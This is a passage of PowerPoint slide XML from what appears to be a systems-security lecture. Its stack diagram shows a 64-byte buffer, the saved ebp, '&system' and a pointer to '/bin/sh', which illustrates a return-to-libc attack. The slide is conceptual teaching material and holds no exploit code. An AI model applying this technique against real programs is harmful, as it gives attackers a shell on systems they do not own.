                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argc</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="761747" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>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3" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="736099" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>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16" name="Arc 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5561514"/>
            <a:ext cx="685800" cy="534486"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 16471755"/>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7" name="Curved Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7983262" y="5410200"/>
            <a:ext cx="824189" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="curved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6526781" y="1447800"/>
            <a:ext cx="1474219" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6521704" y="2590800"/>
            <a:ext cx="1474219" cy="398502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1676400"/>
            <a:ext cx="4267200" cy="1160502"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 73406"/>
              <a:gd name="adj2" fmla="val 36455"/>
              <a:gd name="adj3" fmla="val 16667"/>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400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret transfers control to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which finds arguments on stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2336619048"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="6079"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="slow" advTm="607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747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="25" name="Table 24"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1044972741"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6521704" y="1479548"/>
          <a:ext cx="1461558" cy="4817544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent4"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argc</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>[1]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8003947" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="761747" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Straight Arrow Connector 27"/>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8003947" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="TextBox 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000"/>
              <a:ext cx="736099" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Arrow Connector 30"/>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32" name="Arc 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="5561514"/>
            <a:ext cx="685800" cy="534486"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 16471755"/>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3" name="Curved Connector 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7983262" y="5410200"/>
            <a:ext cx="824189" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="curved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6526781" y="1447800"/>
            <a:ext cx="1474219" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6521704" y="2590800"/>
            <a:ext cx="1474219" cy="398502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent2">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
